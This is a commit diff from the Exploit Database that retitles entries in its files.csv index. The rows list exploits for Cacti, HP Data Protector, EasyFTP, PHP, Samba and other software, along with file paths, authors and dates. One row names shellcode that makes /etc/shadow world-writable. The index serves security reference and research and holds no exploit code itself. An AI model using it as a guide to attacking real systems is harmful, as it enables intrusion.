DB: 2016-08-15
2 new exploits Cacti 0.8.6d Remote Command Execution Exploit Cacti 0.8.6d - Remote Command Execution Exploit Cacti 0.8.6i (copy_cacti_user.php) SQL Injection Create Admin Exploit Cacti 0.8.6i - 'copy_cacti_user.php' SQL Injection Create Admin Exploit PHP < 4.4.5 - / 5.2.1 - php_binary Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 - WDDX Session Deserialization Information Leak PHP < 4.4.5 / 5.2.1 - php_binary Session Deserialization Information Leak PHP < 4.4.5 / 5.2.1 - WDDX Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 - _SESSION unset() Local Exploit PHP < 4.4.5 - / 5.2.1 - _SESSION Deserialization Overwrite Exploit PHP < 4.4.5 / 5.2.1 - _SESSION unset() Local Exploit PHP < 4.4.5 / 5.2.1 - _SESSION Deserialization Overwrite Exploit Cacti 0.8.6-d graph_view.php Command Injection (Metasploit) Cacti 0.8.6-d - graph_view.php Command Injection (Metasploit) Samba 3.0.10 - 3.3.5 - Format String And Security Bypass Samba 3.0.10 < 3.3.5 - Format String And Security Bypass Allomani - E-Store 1.0 - CSRF Add Admin Account Allomani - Super Multimedia 2.5 - CSRF Add Admin Account Allomani - E-Store 1.0 - CSRF (Add Admin Account) Allomani - Super Multimedia 2.5 - CSRF (Add Admin Account) HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow DoS HP Data Protector Media Operations NULL Pointer Dereference Remote DoS HP Data Protector Media Operations - NULL Pointer Dereference Remote DoS JBoss Application Server Remote Exploit JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Exploit EasyFTP Server 1.7.0.11 MKD Command Stack Buffer Overflow EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow EasyFTP Server 1.7.0.11 LIST Command Stack Buffer Overflow EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow EasyFTP Server 1.7.0.11 CWD Command Stack Buffer Overflow EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow EasyFTP Server 1.7.0.11 list.html path Stack Buffer Overflow EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow Cacti graph_view.php Remote Command Execution Cacti - graph_view.php Remote Command Execution Linux/SuperH (sh4) - setuid(0) - chmod(_/etc/shadow__ 0666) - exit(0) shellcode (43 bytes) Linux/SuperH (sh4) - setuid(0) / chmod(_/etc/shadow__ 0666) / exit(0) Shellcode (43 bytes) HP Data Protector 6.20 EXEC_CMD Buffer Overflow HP Data Protector 6.20 - EXEC_CMD Buffer Overflow HP Data Protector Remote Shell for HP-UX HP Data Protector - Remote Shell for HP-UX WHMCompleteSolution (cart.php) 3.x.x < 4.0.x - Local File Disclosure WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - (cart.php) Local File Disclosure hp data protector media operations 6.20 - Directory Traversal HP Data Protector Media Operations 6.20 - Directory Traversal HP Data Protector 6.1 EXEC_CMD Remote Code Execution HP Data Protector 6.1 - EXEC_CMD Remote Code Execution HP Data Protector Client EXEC_CMD Remote Code Execution HP Data Protector Client - EXEC_CMD Remote Code Execution HP Data Protector Create New Folder Buffer Overflow HP Data Protector - Create New Folder Buffer Overflow Irfanview JPEG2000 <= 4.3.2.0 - jp2 - Stack Buffer Overflow Irfanview JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow HP Data Protector DtbClsLogin Buffer Overflow HP Data Protector - DtbClsLogin Buffer Overflow RaXnet Cacti 0.5/0.6/0.8 Config_Settings.php Remote File Inclusion RaXnet Cacti 0.5/0.6/0.8 - Config_Settings.php Remote File Inclusion RaXnet Cacti 0.5/0.6/0.8 Top_Graph_Header.php Remote File Inclusion RaXnet Cacti 0.5/0.6/0.8 - Top_Graph_Header.php Remote File Inclusion RaXnet Cacti 0.5/0.6.x/0.8.x Graph_Image.php Remote Command Execution Variant RaXnet Cacti 0.5/0.6.x/0.8.x - Graph_Image.php Remote Command Execution Variant TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) - Crash PoC TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash PoC HP Data Protector Arbitrary Remote Command Execution HP Data Protector - Arbitrary Remote Command Execution Indusoft Thin Client 7.1 - ActiveX - Buffer Overflow Indusoft Thin Client 7.1 - ActiveX Buffer Overflow BlooMooWeb 1.0.9 - ActiveX Control - Multiple Vulnerabilities BlooMooWeb 1.0.9 - ActiveX Control Multiple Vulnerabilities HP Data Protector Cell Request Service Buffer Overflow HP Data Protector - Cell Request Service Buffer Overflow Firefox 5.0 - 15.0.1 - __exposedProps__ XCS Code Execution Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution Cacti 0.8.7 graph_view.php graph_list Parameter SQL Injection Cacti 0.8.7 graph.php view_type Parameter XSS Cacti 0.8.7 graph_view.php filter Parameter XSS Cacti 0.8.7 tree.php Multiple Parameter SQL Injection Cacti 0.8.7 graph_xport.php local_graph_id Parameter SQL Injection Cacti 0.8.7 index.php/sql.php Login Action login_username Parameter SQL Injection Cacti 0.8.7 - graph_view.php graph_list Parameter SQL Injection Cacti 0.8.7 - graph.php view_type Parameter XSS Cacti 0.8.7 - graph_view.php filter Parameter XSS Cacti 0.8.7 - tree.php Multiple Parameter SQL Injection Cacti 0.8.7 - graph_xport.php local_graph_id Parameter SQL Injection Cacti 0.8.7 - index.php/sql.php Login Action login_username Parameter SQL Injection MG2 - 'list' Parameter - Cross-Site Scripting MG2 - 'list' Parameter Cross-Site Scripting HP Data Protector Backup Client Service - Directory Traversal HP Data Protector - Backup Client Service Directory Traversal HP Data Protector EXEC_BAR Remote Command Execution HP Data Protector - EXEC_BAR Remote Command Execution HP Data Protector Backup Client Service Remote Code Execution HP Data Protector - Backup Client Service Remote Code Execution Cacti 0.8.x graph.php Multiple Parameter XSS Cacti 0.8.x - graph.php Multiple Parameter XSS Jetty 6.1.x JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities Jetty 6.1.x - JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities Cacti 0.8.7 on Red Hat High Performance Computing (HPC) utilities.php filter Parameter XSS Cacti 0.8.7 (Red Hat High Performance Computing - HPC) - utilities.php filter Parameter XSS HP Data Protector EXEC_INTEGUTIL Remote Code Execution HP Data Protector - EXEC_INTEGUTIL Remote Code Execution HP Data Protector 8.10 Remote Command Execution HP Data Protector 8.10 - Remote Command Execution Blat.exe 2.7.6 SMTP / NNTP Mailer - Buffer Overflow Blat 2.7.6 SMTP / NNTP Mailer - Buffer Overflow Exim 4 (Debian / Ubuntu) - Spool Local Privilege Escalation Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Local Privilege Escalation Wireshark 2.0.0 - 2.0.4 - MMSE_ WAP_ WBXML_ and WSP Dissectors Denial of Service Wireshark 2.0.0 - 2.0.4 - CORBA IDL Dissectors Denial of Service Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - PacketBB Dissector Denial of Service Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - WSP Dissector Denial of Service Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - RLC Dissector Denial of Service Wireshark 2.0.0 < 2.0.4 - MMSE_ WAP_ WBXML_ and WSP Dissectors Denial of Service Wireshark 2.0.0 < 2.0.4 - CORBA IDL Dissectors Denial of Service Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - PacketBB Dissector Denial of Service Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - WSP Dissector Denial of Service Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - RLC Dissector Denial of Service FreePBX 13 / 14 - Remote Code Execution FreePBX 13 / 14 - Remote Command Execution With Privilege Escalation Easy FTP Server - _APPE_ Command Buffer Overflow Remote Exploit Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit Samsung Smart Home Camera SNH-P-6410 - Command Injection
This commit is contained in:
Offensive Security
parent
52c4bb1e58
commit
8c28728c9f
3 changed files with 126 additions and 61 deletions
123
files.csv
123
files.csv
|
|
@ -870,7 +870,7 @@ id,file,description,date,author,platform,type,port
|
|||
1059,platforms/php/webapps/1059.pl,"WordPress 1.5.1.1 - 'add new admin' SQL Injection Exploit",2005-06-21,RusH,php,webapps,0
|
||||
1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 Full Command Execution Exploit",2005-06-21,RusH,php,webapps,0
|
||||
1061,platforms/php/webapps/1061.pl,"Mambo 4.5.2.1 - SQL Injection Exploit",2005-06-21,RusH,php,webapps,0
|
||||
1062,platforms/php/webapps/1062.pl,"Cacti 0.8.6d Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0
|
||||
1062,platforms/php/webapps/1062.pl,"Cacti 0.8.6d - Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0
|
||||
1063,platforms/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users Denial of Service (Perl)",2005-06-22,g30rg3_x,php,dos,0
|
||||
1064,platforms/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users Denial of Service (C)",2005-06-22,HaCkZaTaN,php,dos,0
|
||||
1065,platforms/windows/dos/1065.c,"Microsoft Windows - (SMB) Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0
|
||||
|
|
@ -2717,7 +2717,7 @@ id,file,description,date,author,platform,type,port
|
|||
3042,platforms/windows/dos/3042.html,"Macromedia Shockwave 10 (SwDir.dll) Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,windows,dos,0
|
||||
3043,platforms/php/webapps/3043.txt,"x-news 1.1 - (users.txt) Remote Password Disclosure",2006-12-30,bd0rk,php,webapps,0
|
||||
3044,platforms/php/webapps/3044.txt,"Voodoo chat 1.0RC1b (users.dat) Password Disclosure",2006-12-30,bd0rk,php,webapps,0
|
||||
3045,platforms/php/webapps/3045.php,"Cacti 0.8.6i (copy_cacti_user.php) SQL Injection Create Admin Exploit",2006-12-30,rgod,php,webapps,0
|
||||
3045,platforms/php/webapps/3045.php,"Cacti 0.8.6i - 'copy_cacti_user.php' SQL Injection Create Admin Exploit",2006-12-30,rgod,php,webapps,0
|
||||
3046,platforms/asp/webapps/3046.txt,"SoftArtisans SAFileUp 5.0.14 - (viewsrc.asp) Script Source Disclosure",2006-12-30,"Inge Henriksen",asp,webapps,0
|
||||
3047,platforms/php/webapps/3047.txt,"FreeStyle Wiki 3.6.2 - (user.dat) Password Disclosure",2006-12-30,bd0rk,php,webapps,0
|
||||
3048,platforms/asp/webapps/3048.pl,"Click N Print Coupons 2006.01 - (key) SQL Injection Exploit",2006-12-30,ajann,asp,webapps,0
|
||||
|
|
@ -3079,8 +3079,8 @@ id,file,description,date,author,platform,type,port
|
|||
3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
|
||||
3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - (topic_title.php) SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
|
||||
3412,platforms/cgi/webapps/3412.txt,"RRDBrowse 1.6 - Remote Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps,0
|
||||
3413,platforms/multiple/local/3413.php,"PHP < 4.4.5 - / 5.2.1 - php_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0
|
||||
3414,platforms/multiple/local/3414.php,"PHP < 4.4.5 - / 5.2.1 - WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0
|
||||
3413,platforms/multiple/local/3413.php,"PHP < 4.4.5 / 5.2.1 - php_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0
|
||||
3414,platforms/multiple/local/3414.php,"PHP < 4.4.5 / 5.2.1 - WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0
|
||||
3415,platforms/linux/dos/3415.html,"Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) DoS Exploit",2007-03-05,mark,linux,dos,0
|
||||
3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) SQL Injection Exploit",2007-03-05,ajann,php,webapps,0
|
||||
3417,platforms/windows/local/3417.php,"PHP 4.4.6 - mssql_[p]connect() Local Buffer Overflow Exploit",2007-03-05,rgod,windows,local,0
|
||||
|
|
@ -3232,8 +3232,8 @@ id,file,description,date,author,platform,type,port
|
|||
3568,platforms/php/webapps/3568.txt,"Free Image Hosting 2.0 - (AD_BODY_TEMP) Remote File Inclusion",2007-03-25,Crackers_Child,php,webapps,0
|
||||
3569,platforms/php/webapps/3569.pl,"PBlang 4.66z Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0
|
||||
3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overlow Exploit",2007-03-25,niXel,windows,remote,21
|
||||
3571,platforms/linux/local/3571.php,"PHP < 4.4.5 - / 5.2.1 - _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0
|
||||
3572,platforms/linux/local/3572.php,"PHP < 4.4.5 - / 5.2.1 - _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0
|
||||
3571,platforms/linux/local/3571.php,"PHP < 4.4.5 / 5.2.1 - _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0
|
||||
3572,platforms/linux/local/3572.php,"PHP < 4.4.5 / 5.2.1 - _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0
|
||||
3574,platforms/php/webapps/3574.pl,"PBlang 4.66z Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0
|
||||
3575,platforms/windows/remote/3575.cpp,"Frontbase 4.2.7 - Remote Buffer Overflow Exploit (windows)",2007-03-25,Heretic2,windows,remote,0
|
||||
3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC - Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0
|
||||
|
|
@ -9289,7 +9289,7 @@ id,file,description,date,author,platform,type,port
|
|||
9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl 2.3.1 - Server Side Include",1999-11-05,patrick,cgi,webapps,0
|
||||
9908,platforms/php/webapps/9908.rb,"BASE 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0
|
||||
9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)",2006-05-04,patrick,cgi,webapps,0
|
||||
9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d graph_view.php Command Injection (Metasploit)",2005-01-15,"David Maciejak",php,webapps,0
|
||||
9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d - graph_view.php Command Injection (Metasploit)",2005-01-15,"David Maciejak",php,webapps,0
|
||||
9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 - configdir Command Injection (Metasploit)",2005-01-15,"Matteo Cantoni",cgi,webapps,0
|
||||
9913,platforms/multiple/remote/9913.rb,"ClamAV Milter 0.92.2 - Blackhole-Mode (sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25
|
||||
9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783
|
||||
|
|
@ -9461,7 +9461,7 @@ id,file,description,date,author,platform,type,port
|
|||
10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0
|
||||
10093,platforms/multiple/remote/10093.txt,"Adobe Shockwave 11.5.1.601 Player - Multiple Code Execution",2009-11-04,"Francis Provencher",multiple,remote,0
|
||||
10094,platforms/jsp/webapps/10094.txt,"IBM Rational RequisitePro 7.10 and ReqWebHelp Multiple Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0
|
||||
10095,platforms/multiple/remote/10095.txt,"Samba 3.0.10 - 3.3.5 - Format String And Security Bypass",2009-11-13,"Jeremy Allison",multiple,remote,0
|
||||
10095,platforms/multiple/remote/10095.txt,"Samba 3.0.10 < 3.3.5 - Format String And Security Bypass",2009-11-13,"Jeremy Allison",multiple,remote,0
|
||||
10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 - authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0
|
||||
10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0
|
||||
10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 - iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0
|
||||
|
|
@ -12417,8 +12417,8 @@ id,file,description,date,author,platform,type,port
|
|||
14102,platforms/windows/dos/14102.py,"Winamp 5.571 - (.avi) Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos,0
|
||||
14103,platforms/multiple/webapps/14103.txt,"Applicure DotDefender 4.01-3 - Persistent XSS",2010-06-28,EnableSecurity,multiple,webapps,80
|
||||
14109,platforms/php/webapps/14109.txt,"YPNinc PHP Realty Script (docID) SQL Injection",2010-06-29,v3n0m,php,webapps,0
|
||||
14110,platforms/php/webapps/14110.txt,"Allomani - E-Store 1.0 - CSRF Add Admin Account",2010-06-29,G0D-F4Th3r,php,webapps,0
|
||||
14111,platforms/php/webapps/14111.txt,"Allomani - Super Multimedia 2.5 - CSRF Add Admin Account",2010-06-29,G0D-F4Th3r,php,webapps,0
|
||||
14110,platforms/php/webapps/14110.txt,"Allomani - E-Store 1.0 - CSRF (Add Admin Account)",2010-06-29,G0D-F4Th3r,php,webapps,0
|
||||
14111,platforms/php/webapps/14111.txt,"Allomani - Super Multimedia 2.5 - CSRF (Add Admin Account)",2010-06-29,G0D-F4Th3r,php,webapps,0
|
||||
14112,platforms/php/webapps/14112.txt,"PageDirector CMS (result.php) SQL Injection",2010-06-29,v3n0m,php,webapps,0
|
||||
14115,platforms/windows/webapps/14115.txt,"Gekko CMS (SQL Injection)",2010-06-29,[]0iZy5,windows,webapps,80
|
||||
14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP (shipkey parameter) 4.3.x - SQL Injection",2010-06-29,"Core Security",multiple,webapps,80
|
||||
|
|
@ -12575,7 +12575,7 @@ id,file,description,date,author,platform,type,port
|
|||
14306,platforms/php/webapps/14306.txt,"HoloCMS 9.0.47 - (news.php) SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0
|
||||
14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0
|
||||
14308,platforms/php/webapps/14308.txt,"WordPress Firestats Plugin - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0
|
||||
15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS",2010-10-23,d0lc3,windows,dos,0
|
||||
15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow DoS",2010-10-23,d0lc3,windows,dos,0
|
||||
14310,platforms/php/webapps/14310.js,"DotDefender 3.8-5 - No Authentication Remote Code Execution Through XSS",2010-07-09,rAWjAW,php,webapps,80
|
||||
14313,platforms/php/webapps/14313.txt,"Joomla MyHome Component (com_myhome) Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0
|
||||
14315,platforms/php/webapps/14315.txt,"Joomla MySms Component (com_mysms) Upload",2010-07-10,Sid3^effects,php,webapps,0
|
||||
|
|
@ -13227,7 +13227,7 @@ id,file,description,date,author,platform,type,port
|
|||
15210,platforms/php/webapps/15210.txt,"Cag CMS 0.2 - (XSS/Blind SQL Injection) Multiple Vulnerabilities",2010-10-05,Shamus,php,webapps,0
|
||||
15212,platforms/osx/dos/15212.txt,"Adobe Acrobat and Reader Array Indexing Remote Code Execution",2010-10-06,"Knud and nSense",osx,dos,0
|
||||
15213,platforms/asp/remote/15213.pl,"ASP.NET - Padding Oracle (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote,0
|
||||
15214,platforms/win_x86/dos/15214.py,"HP Data Protector Media Operations NULL Pointer Dereference Remote DoS",2010-10-06,d0lc3,win_x86,dos,19813
|
||||
15214,platforms/win_x86/dos/15214.py,"HP Data Protector Media Operations - NULL Pointer Dereference Remote DoS",2010-10-06,d0lc3,win_x86,dos,19813
|
||||
15215,platforms/multiple/dos/15215.txt,"Multiple Vendors libc/glob(3) Resource Exhaustion + Remote ftpd-anon (0Day)",2010-10-07,"Maksymilian Arciemowicz",multiple,dos,0
|
||||
15285,platforms/linux/local/15285.c,"Linux Kernel 2.6.36-rc8 - RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
|
||||
15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection",2010-10-19,"Salvatore Fresta",php,webapps,0
|
||||
|
|
@ -14076,7 +14076,7 @@ id,file,description,date,author,platform,type,port
|
|||
16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
|
||||
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",ios,remote,0
|
||||
16273,platforms/php/webapps/16273.php,"PHP Speedy 0.5.2 WordPress Plugin - (admin_container.php) Remote Code Execution Exploit",2011-03-04,mr_me,php,webapps,0
|
||||
16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server Remote Exploit",2011-03-04,kingcope,jsp,webapps,0
|
||||
16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Exploit",2011-03-04,kingcope,jsp,webapps,0
|
||||
16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root",2011-03-04,"Todor Donev",hardware,remote,0
|
||||
16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs (view.php) SQL Injection",2011-03-04,IRAQ_JAGUAR,php,webapps,0
|
||||
16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0
|
||||
|
|
@ -14511,7 +14511,7 @@ id,file,description,date,author,platform,type,port
|
|||
16708,platforms/windows/remote/16708.rb,"LeapWare LeapFTP 2.7.3.600 - PASV Reply Client Overflow",2010-04-30,Metasploit,windows,remote,0
|
||||
16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 Banner Remote Buffer Overflow Exploit",2010-07-03,Metasploit,windows,remote,0
|
||||
16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 PASV Remote Buffer Overflow",2010-06-15,Metasploit,windows,remote,0
|
||||
16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 MKD Command Stack Buffer Overflow",2010-07-27,Metasploit,windows,remote,0
|
||||
16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow",2010-07-27,Metasploit,windows,remote,0
|
||||
16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 - Format String",2010-06-22,Metasploit,windows,remote,21
|
||||
16713,platforms/windows/remote/16713.rb,"Cesar FTP 0.99g - (MKD) Command Buffer Overflow",2011-02-23,Metasploit,windows,remote,0
|
||||
16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB FTP UNLOCK Overflow (Win32)",2010-10-05,Metasploit,windows,remote,2100
|
||||
|
|
@ -14534,10 +14534,10 @@ id,file,description,date,author,platform,type,port
|
|||
16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB FTP PASS Overflow (Win32)",2010-04-30,Metasploit,win_x86,remote,0
|
||||
16732,platforms/windows/remote/16732.rb,"HTTPDX - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0
|
||||
16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version",2010-04-30,Metasploit,windows,remote,21
|
||||
16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 LIST Command Stack Buffer Overflow",2010-08-03,Metasploit,windows,remote,0
|
||||
16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow",2010-08-03,Metasploit,windows,remote,0
|
||||
16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow",2010-10-05,Metasploit,windows,remote,0
|
||||
16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0
|
||||
16737,platforms/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 CWD Command Stack Buffer Overflow",2010-04-30,Metasploit,windows,remote,0
|
||||
16737,platforms/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow",2010-04-30,Metasploit,windows,remote,0
|
||||
16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 - (Win32) Stack Buffer Overflow (LIST)",2010-11-14,Metasploit,windows,remote,0
|
||||
16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit",2010-04-30,Metasploit,windows,remote,21
|
||||
16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server NLST Response Overflow",2010-11-12,Metasploit,windows,remote,21
|
||||
|
|
@ -14571,7 +14571,7 @@ id,file,description,date,author,platform,type,port
|
|||
16768,platforms/windows/remote/16768.rb,"Trend Micro OfficeScan Remote Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,0
|
||||
16769,platforms/windows/remote/16769.rb,"eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow",2010-07-13,Metasploit,windows,remote,8008
|
||||
16770,platforms/windows/remote/16770.rb,"Savant 3.1 Web Server - Overflow",2010-10-04,Metasploit,windows,remote,0
|
||||
16771,platforms/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 list.html path Stack Buffer Overflow",2010-08-17,Metasploit,windows,remote,8080
|
||||
16771,platforms/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow",2010-08-17,Metasploit,windows,remote,8080
|
||||
16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server Authentication Request Handling Buffer Overflow",2010-08-06,Metasploit,windows,remote,80
|
||||
16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server Host Header Overflow",2010-05-09,Metasploit,windows,remote,8028
|
||||
16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow",2010-10-12,Metasploit,windows,remote,0
|
||||
|
|
@ -14681,7 +14681,7 @@ id,file,description,date,author,platform,type,port
|
|||
16878,platforms/linux/remote/16878.rb,"ProFTPD 1.3.2rc3 < 1.3.3b - Telnet IAC Buffer Overflow (FreeBSD)",2010-12-02,Metasploit,linux,remote,0
|
||||
16879,platforms/freebsd/remote/16879.rb,"XTACACSD 4.1.2 report() Buffer Overflow",2010-05-09,Metasploit,freebsd,remote,0
|
||||
16880,platforms/linux/remote/16880.rb,"Samba trans2open - Overflow (*BSD x86)",2010-06-17,Metasploit,linux,remote,0
|
||||
16881,platforms/php/webapps/16881.rb,"Cacti graph_view.php Remote Command Execution",2010-07-03,Metasploit,php,webapps,0
|
||||
16881,platforms/php/webapps/16881.rb,"Cacti - graph_view.php Remote Command Execution",2010-07-03,Metasploit,php,webapps,0
|
||||
16882,platforms/php/webapps/16882.rb,"PHP XML-RPC Arbitrary Code Execution",2010-07-25,Metasploit,php,webapps,0
|
||||
16883,platforms/php/webapps/16883.rb,"Simple PHP Blog 0.4.0 - Remote Command Execution",2010-07-25,Metasploit,php,webapps,0
|
||||
16885,platforms/php/webapps/16885.rb,"TikiWiki jhot Remote Command Execution",2010-07-25,Metasploit,php,webapps,0
|
||||
|
|
@ -14888,7 +14888,7 @@ id,file,description,date,author,platform,type,port
|
|||
17106,platforms/php/webapps/17106.txt,"Rash CMS SQL Injection",2011-04-03,keracker,php,webapps,0
|
||||
17107,platforms/php/webapps/17107.txt,"Banner Ad Management Script SQL Injection",2011-04-03,Egyptian.H4x0rz,php,webapps,0
|
||||
17108,platforms/php/webapps/17108.txt,"OpenCart 1.4.9 - Multiple Local File Inclusion",2011-04-03,KedAns-Dz,php,webapps,0
|
||||
17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) - chmod(_/etc/shadow__ 0666) - exit(0) shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0
|
||||
17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) / chmod(_/etc/shadow__ 0666) / exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0
|
||||
17431,platforms/php/webapps/17431.txt,"Same Team E-shop manager - SQL Injection Exploit",2011-06-22,"Number 7",php,webapps,0
|
||||
17110,platforms/php/webapps/17110.txt,"DoceboLms 4.0.4 - Multiple Stored XSS Vulnerabilities",2011-04-04,LiquidWorm,php,webapps,0
|
||||
17111,platforms/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) - Stored / Reflective XSS",2011-04-04,"Michael Brooks",multiple,webapps,0
|
||||
|
|
@ -15172,7 +15172,7 @@ id,file,description,date,author,platform,type,port
|
|||
